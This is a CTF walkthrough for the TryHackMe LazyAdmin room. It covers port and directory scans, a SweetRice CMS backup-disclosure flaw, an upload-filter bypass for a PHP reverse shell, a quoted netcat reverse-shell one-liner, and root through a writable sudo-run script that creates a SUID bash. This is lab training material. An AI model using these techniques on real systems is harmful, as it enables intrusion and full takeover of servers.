LazyAdmin TryHackMe Walkthrough

Challenge Link:  https://tryhackme.com/room/lazyadmin

Initial Enumeration

As usual I started the initial enumeration by running a port scan using nmap, looking for open ports and default scripts.

┌──(madhav㉿kali)-[~/ctf/thm/lazyAdmin]
└─$ nmap -sC -sV -oN nmap/initial 10.10.93.93  
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-02 15:50 IST
Nmap scan report for 10.10.93.93
Host is up (0.17s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
|   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_  256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.70 seconds

We have only two ports open. There is SSH running on port 22 and Apache web server running on port 80. Let's start the enumeration with port 80 first.

The website shows only the default Apache 2 page. Next I ran a dirb scan to look for hidden files and directories.

┌──(madhav㉿kali)-[~/ctf/thm/lazyAdmin]
└─$ dirb http://10.10.93.93

-----------------
DIRB v2.22
By The Dark Raver
-----------------

URL_BASE: http://10.10.93.93/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.93.93/ ----
==> DIRECTORY: http://10.10.93.93/content/
+ http://10.10.93.93/index.html (CODE:200|SIZE:11321)
+ http://10.10.93.93/server-status (CODE:403|SIZE:276)

---- Entering directory: http://10.10.93.93/content/ ----
==> DIRECTORY: http://10.10.93.93/content/_themes/
==> DIRECTORY: http://10.10.93.93/content/as/
==> DIRECTORY: http://10.10.93.93/content/attachment/
==> DIRECTORY: http://10.10.93.93/content/images/
==> DIRECTORY: http://10.10.93.93/content/inc/
+ http://10.10.93.93/content/index.php (CODE:200|SIZE:2197)
==> DIRECTORY: http://10.10.93.93/content/js/

We have a directory named /content. When we visit the directory, we see a landing page which says that the website is still under construction.

Also we see a line in the footer of the web page which says powered by Basic-CMS.ORG Sweet Rice. This might be the name of the CMS.

We also have a directory named /as where we can login into the CMS but we need a valid username and password for it. I tried guessing some common username and passwords but none of them worked.

Next I searched for 'basiccms.org sweet rice', but instead of getting the website or documentation, I found a few exploitDB links in the top results XD. I looked through all the exploits and the one which I found interesting was an information disclosure exploit.

SweetRice 1.5.1 - Backup Disclosure
SweetRice 1.5.1 - Backup Disclosure.. webapps exploit for PHP platform

According to the exploit, we can simply visit the /inc/mysql_backup/ directory to get a MySQL backup.

I downloaded the backup file and opened it in a text editor. Inside the backup file, I found the password hash for the user manager.

We can crack this hash using hydra or some online password cracking website such as crackstation.net.

This was a very easy password. Now we can login into SweetRice CMS using the credentials we've found into /as directory that we found earlier.

Initial Shell

After logging in, I found an option named Media Center where we can upload our own files. We can upload our php shell here and execute it in order to get a reverse shell back to our system.

But we cannot simply upload our reverse shell there because the upload functionality does not accept .php files.

But we can upload the reverse shell by using some other extensions such as .php5 or .phtml. Once the upload is complete we can run it from the /content/attachment directory.

┌──(madhav㉿kali)-[~/ctf/thm/lazyAdmin]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connection received from (UNKNOWN) [10.10.93.93] 37266
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
 15:03:30 up  2:50,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@THM-Chal:/$

Next I upgraded the dumb shell into a fully interactive TTY using the following commands:

python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo && fg
reset
export TERM=xterm
stty rows 48 columns 179

Next I checked the /home directory and there was a user named itguy. Inside the home directory of user itguy we can read our user flag.

www-data@THM-Chal:/$ ls -lah /home
total 12K
drwxr-xr-x  3 root  root  4.0K Nov 29  2019 .
drwxr-xr-x 23 root  root  4.0K Nov 29  2019 ..
drwxr-xr-x 18 itguy itguy 4.0K Nov 30  2019 itguy
www-data@THM-Chal:/$ cd home/itguy/
www-data@THM-Chal:/home/itguy$ wc -c user.txt 
38 user.txt

Root Shell

Next I ran the sudo -l command to check if we run can any command as user root and found that user www-data can run a perl script present the home directory of user itguy as root.

www-data@THM-Chal:/home/itguy$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

Next when I checked the contents of /home/itguy/backup.pl, I found that it was executing another file /etc/copy.sh.

www-data@THM-Chal:/home/itguy$ cat backup.pl 
#!/usr/bin/perl

system("sh", "/etc/copy.sh");

Now I checked the contents of /etc/copy.sh and found a code to get a reverse shell inside it XD.

www-data@THM-Chal:/home/itguy$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f

Next, I checked the permissions of this file and found that we have the permissions to write this file. So instead of getting a reverse shell, I copied the /bin/bash to the/tmp directory and made it a SUID to get the root shell.

www-data@THM-Chal:/home/itguy$ ls -l /etc/copy.sh 
-rw-r--rwx 1 root root 81 Nov 29  2019 /etc/copy.sh
www-data@THM-Chal:/home/itguy$ echo "cp /bin/bash /tmp/bash;chmod +s /tmp/bash" > /etc/copy.sh 

Now if we execute the backup.pl, it will create a binary named bash in the /tmp directory. Then we can execute the binary to get the root shell.

www-data@THM-Chal:/home/itguy$ sudo /usr/bin/perl /home/itguy/backup.pl 
www-data@THM-Chal:/home/itguy$ cd /tmp
www-data@THM-Chal:/tmp$ ./bash -p
bash-4.3# id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)

Hurray! We're now root and now we can read our final flag present in the /root directory.

bash-4.3# cd /root
bash-4.3# ls
root.txt
bash-4.3# wc -c root.txt
38 root.txt

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Alfrey Davilla.